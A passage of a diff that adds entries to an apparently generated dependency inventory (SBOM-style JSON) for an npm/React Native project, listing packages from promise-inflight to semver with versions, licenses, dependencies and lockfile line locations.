"AnalyzedBy": "npm" + }, + { + "ID": "promise-inflight@1.0.1", + "Name": "promise-inflight", + "Identifier": { + "PURL": "pkg:npm/promise-inflight@1.0.1", + "UID": "9bf4a5a438c397cd" + }, + "Version": "1.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16918, + "EndLine": 16924 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "promise-retry@2.0.1", + "Name": "promise-retry", + "Identifier": { + "PURL": "pkg:npm/promise-retry@2.0.1", + "UID": "5c196900ff193161" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "err-code@2.0.3", + "retry@0.12.0" + ], + "Locations": [ + { + "StartLine": 15378, + "EndLine": 15391 + }, + { + "StartLine": 16925, + "EndLine": 16938 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "prompts@2.4.2", + "Name": "prompts", + "Identifier": { + "PURL": "pkg:npm/prompts@2.4.2", + "UID": "a94baf956c9e10f1" + }, + "Version": "2.4.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "kleur@3.0.3", + "sisteransi@1.0.5" + ], + "Locations": [ + { + "StartLine": 16939, + "EndLine": 16951 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "promzard@2.0.0", + "Name": "promzard", + "Identifier": { + "PURL": "pkg:npm/promzard@2.0.0", + "UID": "74d53ea155a3038f" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "read@4.1.0" + ], + "Locations": [ + { + "StartLine": 15392, + "EndLine": 15402 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "prop-types@15.8.1", + "Name": "prop-types", + "Identifier": { + "PURL": "pkg:npm/prop-types@15.8.1", + "UID": "300820308fc06c8b" + }, + "Version": "15.8.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "loose-envify@1.4.0", + "object-assign@4.1.1", + "react-is@16.13.1" + ], + "Locations": [ + { + "StartLine": 16952, + "EndLine": 16962 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "protobufjs@7.5.4", + "Name": "protobufjs", + "Identifier": { + "PURL": "pkg:npm/protobufjs@7.5.4", + "UID": "c51ca229eeb0566c" + }, + "Version": "7.5.4", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@protobufjs/aspromise@1.1.2", + "@protobufjs/base64@1.1.2", + "@protobufjs/codegen@2.0.4", + "@protobufjs/eventemitter@1.1.0", + "@protobufjs/fetch@1.1.0", + "@protobufjs/float@1.0.2", + "@protobufjs/inquire@1.1.0", + "@protobufjs/path@1.1.2", + "@protobufjs/pool@1.1.0", + "@protobufjs/utf8@1.1.0", + "@types/node@24.7.0", + "long@5.3.2" + ], + "Locations": [ + { + "StartLine": 16969, + "EndLine": 16992 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "proxy-from-env@1.1.0", + "Name": "proxy-from-env", + "Identifier": { + "PURL": "pkg:npm/proxy-from-env@1.1.0", + "UID": "7569fe4db92a5b0a" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16993, + "EndLine": 16998 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "pump@3.0.3", + "Name": "pump", + "Identifier": { + "PURL": "pkg:npm/pump@3.0.3", + "UID": "6749ac079fa40546" + }, + "Version": "3.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "end-of-stream@1.4.5", + "once@1.4.0" + ], + "Locations": [ + { + "StartLine": 16999, + "EndLine": 17008 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "qrcode-terminal@0.12.0", + "Name": "qrcode-terminal", + "Identifier": { + "PURL": "pkg:npm/qrcode-terminal@0.12.0", + "UID": "eec01239b6b6938e" + }, + "Version": "0.12.0", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15403, + "EndLine": 15411 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "qs@6.13.0", + "Name": "qs", + "Identifier": { + "PURL": "pkg:npm/qs@6.13.0", + "UID": "ee24446d330a5e73" + }, + "Version": "6.13.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "side-channel@1.1.0" + ], + "Locations": [ + { + "StartLine": 17036, + "EndLine": 17051 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "query-string@7.1.3", + "Name": "query-string", + "Identifier": { + "PURL": "pkg:npm/query-string@7.1.3", + "UID": "296b89fc3fdfa19f" + }, + "Version": "7.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "decode-uri-component@0.2.2", + "filter-obj@1.1.0", + "split-on-first@1.1.0", + "strict-uri-encode@2.0.0" + ], + "Locations": [ + { + "StartLine": 17052, + "EndLine": 17069 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "queue@6.0.2", + "Name": "queue", + "Identifier": { + "PURL": "pkg:npm/queue@6.0.2", + "UID": "32576e7a7f45c73d" + }, + "Version": "6.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "inherits@2.0.4" + ], + "Locations": [ + { + "StartLine": 17070, + "EndLine": 17078 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "queue-microtask@1.2.3", + "Name": "queue-microtask", + "Identifier": { + "PURL": "pkg:npm/queue-microtask@1.2.3", + "UID": "8535e5205cda23b4" + }, + "Version": "1.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 17079, + "EndLine": 17098 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "quick-lru@4.0.1", + "Name": "quick-lru", + "Identifier": { + "PURL": "pkg:npm/quick-lru@4.0.1", + "UID": "410b3c1d50b75a83" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 17099, + "EndLine": 17107 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "range-parser@1.2.1", + "Name": "range-parser", + "Identifier": { + "PURL": "pkg:npm/range-parser@1.2.1", + "UID": "ec64df248c96fd9a" + }, + "Version": "1.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 17108, + "EndLine": 17116 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "raw-body@2.5.2", + "Name": "raw-body", + "Identifier": { + "PURL": "pkg:npm/raw-body@2.5.2", + "UID": "5e8af3d4a89b1f4a" + }, + "Version": "2.5.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bytes@3.1.2", + "http-errors@2.0.0", + "iconv-lite@0.4.24", + "unpipe@1.0.0" + ], + "Locations": [ + { + "StartLine": 17117, + "EndLine": 17132 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "rc@1.2.8", + "Name": "rc", + "Identifier": { + "PURL": "pkg:npm/rc@1.2.8", + "UID": "84ad3b0f976de249" + }, + "Version": "1.2.8", + "Licenses": [ + "(BSD-2-Clause OR MIT OR Apache-2.0)" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "deep-extend@0.6.0", + "ini@1.3.8", + "minimist@1.2.8", + "strip-json-comments@2.0.1" + ], + "Locations": [ + { + "StartLine": 17133, + "EndLine": 17147 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-addons-shallow-compare@15.6.2", + "Name": "react-addons-shallow-compare", + "Identifier": { + "PURL": "pkg:npm/react-addons-shallow-compare@15.6.2", + "UID": "dec730174f5bb8a6" + }, + "Version": "15.6.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fbjs@0.8.18", + "object-assign@4.1.1" + ], + "Locations": [ + { + "StartLine": 17166, + "EndLine": 17175 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-devtools-core@6.1.5", + "Name": "react-devtools-core", + "Identifier": { + "PURL": "pkg:npm/react-devtools-core@6.1.5", + "UID": "97f5180e800a5894" + }, + "Version": "6.1.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "shell-quote@1.8.3", + "ws@7.5.10" + ], + "Locations": [ + { + "StartLine": 17176, + "EndLine": 17185 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-freeze@1.0.4", + "Name": "react-freeze", + "Identifier": { + "PURL": "pkg:npm/react-freeze@1.0.4", + "UID": "6df3afc7779e9e70" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17207, + "EndLine": 17218 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-is@16.13.1", + "Name": "react-is", + "Identifier": { + "PURL": "pkg:npm/react-is@16.13.1", + "UID": "d125f418c72b2c88" + }, + "Version": "16.13.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10006, + "EndLine": 10011 + }, + { + "StartLine": 16963, + "EndLine": 16968 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-is@18.3.1", + "Name": "react-is", + "Identifier": { + "PURL": "pkg:npm/react-is@18.3.1", + "UID": "a6183c186aa5c8fc" + }, + "Version": "18.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 17219, + "EndLine": 17224 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-is@19.2.4", + "Name": "react-is", + "Identifier": { + "PURL": "pkg:npm/react-is@19.2.4", + "UID": "f170ce4e0971e3f7" + }, + "Version": "19.2.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4810, + "EndLine": 4815 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-animatable@1.4.0", + "Name": "react-native-animatable", + "Identifier": { + "PURL": "pkg:npm/react-native-animatable@1.4.0", + "UID": "75f450ff06e5a118" + }, + "Version": "1.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "prop-types@15.8.1" + ], + "Locations": [ + { + "StartLine": 17282, + "EndLine": 17290 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-drawer-layout@4.1.13", + "Name": "react-native-drawer-layout", + "Identifier": { + "PURL": "pkg:npm/react-native-drawer-layout@4.1.13", + "UID": "77bd8e306cd3f943" + }, + "Version": "4.1.13", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "react-native-gesture-handler@2.28.0", + "react-native-reanimated@4.3.0", + "react-native@0.81.0", + "react@19.1.0", + "use-latest-callback@0.2.5" + ], + "Locations": [ + { + "StartLine": 17752, + "EndLine": 17766 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-fit-image@1.5.5", + "Name": "react-native-fit-image", + "Identifier": { + "PURL": "pkg:npm/react-native-fit-image@1.5.5", + "UID": "a839964fea59816" + }, + "Version": "1.5.5", + "Licenses": [ + "Beerware" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "prop-types@15.8.1" + ], + "Locations": [ + { + "StartLine": 17782, + "EndLine": 17790 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-iphone-x-helper@1.3.1", + "Name": "react-native-iphone-x-helper", + "Identifier": { + "PURL": "pkg:npm/react-native-iphone-x-helper@1.3.1", + "UID": "7e3209036f1b1132" + }, + "Version": "1.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 17921, + "EndLine": 17929 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-is-edge-to-edge@1.3.1", + "Name": "react-native-is-edge-to-edge", + "Identifier": { + "PURL": "pkg:npm/react-native-is-edge-to-edge@1.3.1", + "UID": "d219b560782b7503" + }, + "Version": "1.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17930, + "EndLine": 17939 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-quick-base64@2.2.2", + "Name": "react-native-quick-base64", + "Identifier": { + "PURL": "pkg:npm/react-native-quick-base64@2.2.2", + "UID": "9316fc206c78181b" + }, + "Version": "2.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18219, + "EndLine": 18231 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-refresh@0.14.2", + "Name": "react-refresh", + "Identifier": { + "PURL": "pkg:npm/react-refresh@0.14.2", + "UID": "9dc8ef7f609db9f4" + }, + "Version": "0.14.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 18739, + "EndLine": 18747 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "read@4.1.0", + "Name": "read", + "Identifier": { + "PURL": "pkg:npm/read@4.1.0", + "UID": "4ab748ea2748f753" + }, + "Version": "4.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mute-stream@2.0.0" + ], + "Locations": [ + { + "StartLine": 15412, + "EndLine": 15422 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "read-cmd-shim@5.0.0", + "Name": "read-cmd-shim", + "Identifier": { + "PURL": "pkg:npm/read-cmd-shim@5.0.0", + "UID": "7ea69d023e3792c7" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15423, + "EndLine": 15430 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "read-pkg@5.2.0", + "Name": "read-pkg", + "Identifier": { + "PURL": "pkg:npm/read-pkg@5.2.0", + "UID": "221b9665ccfa8d17" + }, + "Version": "5.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/normalize-package-data@2.4.4", + "normalize-package-data@2.5.0", + "parse-json@5.2.0", + "type-fest@0.6.0" + ], + "Locations": [ + { + "StartLine": 18769, + "EndLine": 18783 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "read-pkg-up@7.0.1", + "Name": "read-pkg-up", + "Identifier": { + "PURL": "pkg:npm/read-pkg-up@7.0.1", + "UID": "652d731ce41c6fe8" + }, + "Version": "7.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "find-up@4.1.0", + "read-pkg@5.2.0", + "type-fest@0.8.1" + ], + "Locations": [ + { + "StartLine": 18784, + "EndLine": 18800 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "readable-stream@2.3.8", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@2.3.8", + "UID": "28ec22b2003e77f5" + }, + "Version": "2.3.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "core-util-is@1.0.3", + "inherits@2.0.4", + "isarray@1.0.0", + "process-nextick-args@2.0.1", + "safe-buffer@5.1.2", + "string_decoder@1.1.1", + "util-deprecate@1.0.2" + ], + "Locations": [ + { + "StartLine": 17393, + "EndLine": 17407 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "readable-stream@3.6.2", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@3.6.2", + "UID": "b6e77a60a3830e62" + }, + "Version": "3.6.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "inherits@2.0.4", + "string_decoder@1.3.0", + "util-deprecate@1.0.2" + ], + "Locations": [ + { + "StartLine": 18898, + "EndLine": 18911 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "readable-stream@4.7.0", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@4.7.0", + "UID": "507d373bdefc8a80" + }, + "Version": "4.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "abort-controller@3.0.0", + "buffer@6.0.3", + "events@3.3.0", + "process@0.11.10", + "string_decoder@1.3.0" + ], + "Locations": [ + { + "StartLine": 18273, + "EndLine": 18288 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "redent@3.0.0", + "Name": "redent", + "Identifier": { + "PURL": "pkg:npm/redent@3.0.0", + "UID": "ec79150e12ff194f" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "indent-string@4.0.0", + "strip-indent@3.0.0" + ], + "Locations": [ + { + "StartLine": 18912, + "EndLine": 18924 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "regenerate@1.4.2", + "Name": "regenerate", + "Identifier": { + "PURL": "pkg:npm/regenerate@1.4.2", + "UID": "c78841bd29a4ce0b" + }, + "Version": "1.4.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 18954, + "EndLine": 18959 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "regenerate-unicode-properties@10.2.2", + "Name": "regenerate-unicode-properties", + "Identifier": { + "PURL": "pkg:npm/regenerate-unicode-properties@10.2.2", + "UID": "abf96b81188c817e" + }, + "Version": "10.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "regenerate@1.4.2" + ], + "Locations": [ + { + "StartLine": 18960, + "EndLine": 18971 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "regenerator-runtime@0.13.11", + "Name": "regenerator-runtime", + "Identifier": { + "PURL": "pkg:npm/regenerator-runtime@0.13.11", + "UID": "5e82c5b0b8a160d4" + }, + "Version": "0.13.11", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 18972, + "EndLine": 18977 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "regexpu-core@6.4.0", + "Name": "regexpu-core", + "Identifier": { + "PURL": "pkg:npm/regexpu-core@6.4.0", + "UID": "64f87b4891460a20" + }, + "Version": "6.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "regenerate-unicode-properties@10.2.2", + "regenerate@1.4.2", + "regjsgen@0.8.0", + "regjsparser@0.13.0", + "unicode-match-property-ecmascript@2.0.0", + "unicode-match-property-value-ecmascript@2.2.1" + ], + "Locations": [ + { + "StartLine": 18999, + "EndLine": 19015 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "regjsgen@0.8.0", + "Name": "regjsgen", + "Identifier": { + "PURL": "pkg:npm/regjsgen@0.8.0", + "UID": "7d7deabb4f143fc5" + }, + "Version": "0.8.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19016, + "EndLine": 19021 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "regjsparser@0.13.0", + "Name": "regjsparser", + "Identifier": { + "PURL": "pkg:npm/regjsparser@0.13.0", + "UID": "263b3ed5d4ac9c3c" + }, + "Version": "0.13.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "jsesc@3.1.0" + ], + "Locations": [ + { + "StartLine": 19022, + "EndLine": 19033 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "require-directory@2.1.1", + "Name": "require-directory", + "Identifier": { + "PURL": "pkg:npm/require-directory@2.1.1", + "UID": "2769c21ca3577d6" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19034, + "EndLine": 19042 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "require-main-filename@2.0.0", + "Name": "require-main-filename", + "Identifier": { + "PURL": "pkg:npm/require-main-filename@2.0.0", + "UID": "e2a53a6b0e635eaa" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19043, + "EndLine": 19049 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "require-resolve@0.0.2", + "Name": "require-resolve", + "Identifier": { + "PURL": "pkg:npm/require-resolve@0.0.2", + "UID": "e057e2da984a31e7" + }, + "Version": "0.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "x-path@0.0.2" + ], + "Locations": [ + { + "StartLine": 19050, + "EndLine": 19058 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "reselect@4.1.8", + "Name": "reselect", + "Identifier": { + "PURL": "pkg:npm/reselect@4.1.8", + "UID": "bbdde4199f6e8f64" + }, + "Version": "4.1.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19059, + "EndLine": 19064 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "resolve@1.22.10", + "Name": "resolve", + "Identifier": { + "PURL": "pkg:npm/resolve@1.22.10", + "UID": "dde810f6eb43dd25" + }, + "Version": "1.22.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-core-module@2.16.1", + "path-parse@1.0.7", + "supports-preserve-symlinks-flag@1.0.0" + ], + "Locations": [ + { + "StartLine": 19065, + "EndLine": 19084 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "resolve-from@4.0.0", + "Name": "resolve-from", + "Identifier": { + "PURL": "pkg:npm/resolve-from@4.0.0", + "UID": "5a6ff3ba98bd562f" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19108, + "EndLine": 19116 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "resolve-from@5.0.0", + "Name": "resolve-from", + "Identifier": { + "PURL": "pkg:npm/resolve-from@5.0.0", + "UID": "3140fbf798592df1" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2349, + "EndLine": 2357 + }, + { + "StartLine": 3506, + "EndLine": 3514 + }, + { + "StartLine": 19098, + "EndLine": 19107 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "restore-cursor@3.1.0", + "Name": "restore-cursor", + "Identifier": { + "PURL": "pkg:npm/restore-cursor@3.1.0", + "UID": "446facf583eec76d" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "onetime@5.1.2", + "signal-exit@3.0.7" + ], + "Locations": [ + { + "StartLine": 19127, + "EndLine": 19139 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "retry@0.12.0", + "Name": "retry", + "Identifier": { + "PURL": "pkg:npm/retry@0.12.0", + "UID": "6b8a315456551e07" + }, + "Version": "0.12.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15431, + "EndLine": 15440 + }, + { + "StartLine": 19140, + "EndLine": 19149 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "reusify@1.1.0", + "Name": "reusify", + "Identifier": { + "PURL": "pkg:npm/reusify@1.1.0", + "UID": "bed5111966d44771" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19150, + "EndLine": 19159 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "rimraf@3.0.2", + "Name": "rimraf", + "Identifier": { + "PURL": "pkg:npm/rimraf@3.0.2", + "UID": "8831dc6e13690657" + }, + "Version": "3.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "glob@7.2.3" + ], + "Locations": [ + { + "StartLine": 19160, + "EndLine": 19175 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "run-parallel@1.2.0", + "Name": "run-parallel", + "Identifier": { + "PURL": "pkg:npm/run-parallel@1.2.0", + "UID": "9ac829ba69d7e79e" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "queue-microtask@1.2.3" + ], + "Locations": [ + { + "StartLine": 19176, + "EndLine": 19198 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "safe-buffer@5.1.2", + "Name": "safe-buffer", + "Identifier": { + "PURL": "pkg:npm/safe-buffer@5.1.2", + "UID": "c190e5ced961b56b" + }, + "Version": "5.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 17408, + "EndLine": 17413 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "safe-buffer@5.2.1", + "Name": "safe-buffer", + "Identifier": { + "PURL": "pkg:npm/safe-buffer@5.2.1", + "UID": "6b8fee08702be502" + }, + "Version": "5.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19219, + "EndLine": 19238 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "safe-regex-test@1.1.0", + "Name": "safe-regex-test", + "Identifier": { + "PURL": "pkg:npm/safe-regex-test@1.1.0", + "UID": "ef63ffed014ae83f" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bound@1.0.4", + "es-errors@1.3.0", + "is-regex@1.2.1" + ], + "Locations": [ + { + "StartLine": 19256, + "EndLine": 19272 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "safer-buffer@2.1.2", + "Name": "safer-buffer", + "Identifier": { + "PURL": "pkg:npm/safer-buffer@2.1.2", + "UID": "3a7b5afd513d580b" + }, + "Version": "2.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15441, + "EndLine": 15448 + }, + { + "StartLine": 19273, + "EndLine": 19278 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "sax@1.4.1", + "Name": "sax", + "Identifier": { + "PURL": "pkg:npm/sax@1.4.1", + "UID": "aa359e039523f58b" + }, + "Version": "1.4.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19279, + "EndLine": 19284 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "scheduler@0.26.0", + "Name": "scheduler", + "Identifier": { + "PURL": "pkg:npm/scheduler@0.26.0", + "UID": "be036e4d8d4d0ad0" + }, + "Version": "0.26.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19285, + "EndLine": 19290 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "semver@5.7.2", + "Name": "semver", + "Identifier": { + "PURL": "pkg:npm/semver@5.7.2", + "UID": "df8b05d494ecf3bb" + }, + "Version": "5.7.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 18880, + "EndLine": 18888 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "semver@6.3.1", + "Name": "semver", + "Identifier": { + "PURL": "pkg:npm/semver@6.3.1", + "UID": "2b454078df7c5dc4" + }, + "Version": "6.3.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19291, + "EndLine": 19299 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "semver@7.7.3", + "Name": "semver", + "Identifier": { + "PURL": "pkg:npm/semver@7.7.3", + "UID": "853104d11a07cbfb" + }, + "Version": "7.7.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2358, + "EndLine": 2369 + }, + { + "StartLine": 3945, + "EndLine": 3957 + }, + { + "StartLine": 4206, + "EndLine": 4218 + }, + { + "StartLine": 4308, + "EndLine": 4320 + }, + { + "StartLine": 4331, + "EndLine": 4343 + }, + { + "StartLine": 4599, + "EndLine": 4610 + }, + { + "StartLine": 5652, + "EndLine": 5664 + }, + { + "StartLine": 8665, + "EndLine": 8677 + }, + { + "StartLine": 10916, + "EndLine": 10928 + }, + { + "StartLine": 11482, + "EndLine": 11494 + }, + { + "StartLine": 12120, + "EndLine": 12132 + }, + { + "StartLine": 13194, + "EndLine": 13205 + }, + { + "StartLine": 13256, + "EndLine": 13268 + }, + { + "StartLine": 13342, + "EndLine": 13353 + }, + { + "StartLine": 15449, + "EndLine": 15461 + }, + { + "StartLine": 16458, + "EndLine": 16470 + }, + { + "StartLine": 17659, + "EndLine": 17670 + }, + { + "StartLine": 